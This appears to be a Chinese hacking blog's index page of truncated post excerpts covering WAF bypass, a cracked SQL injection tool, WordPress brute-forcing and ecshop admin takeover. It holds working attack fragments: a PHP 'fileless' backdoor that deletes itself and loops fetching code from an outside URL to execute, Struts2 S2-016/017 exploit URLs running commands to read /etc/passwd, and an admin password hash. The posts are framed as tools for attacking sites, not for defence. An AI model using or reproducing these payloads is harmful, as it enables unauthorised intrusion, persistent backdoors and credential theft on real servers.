轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

    XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。 构建如下HTML表单: <!DOCTYPE html> &l...

- 阅读全文 -

pangolin professinal edition 4.0.0.1293特别版

    Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。下载版本为15天免费的,该工具支持数据库类型都是国内外主流使用的数据库类型,包括: Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, Mysql,...

- 阅读全文 -

PHP 无文件后门

  webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file...

- 阅读全文 -

IIS详细错误代码以及解释

  概要 当用户试图通过 HTTP 或文件传输协议 (FTP) 访问一台正在运行 Internet 信息服务 (IIS) 的服务器上的内容时,IIS 返回一个表示该请求的状态的数字代码。该状态代码记录在 IIS 日志中,同时也可能在 Web 浏览器或 FTP 客户端显示。状态代码可以指明具体请求是否已成功,还可以揭示请求失败的确切原因。 回到顶端 更多信息 日志文件的位置 在默认状态下,...

- 阅读全文 -

最新WordPress账号密码暴力破解脚本

  在做渗透测试的时候,有时候会遇到一个wordpress博客, 如果版本比较新,插件也没有漏洞的话,可以爆破用户名密码来尝试下。 大脑混沌情况下写的,有bug欢迎提出,由于是php的所以跑起来比较慢, 下次发包还是调用命令结合hydra来爆破。 原理是通过URL /?author= 遍历获取用户名, 然后先跑用户名与密码相同的用户, 再调用同目录下pass.txt中的密码文件进行爆破。...

- 阅读全文 -

ecshop后台shell技术分享

之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。 用户密码 admin:d03a7617433c2826976062fec569a434 ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93 那就用之前的admin的密码和hash_code的 放在一...

- 阅读全文 -

Struts2 S2-016/S2-017 exp整理

大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: https://www.webshell.cc/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passw...

- 阅读全文 -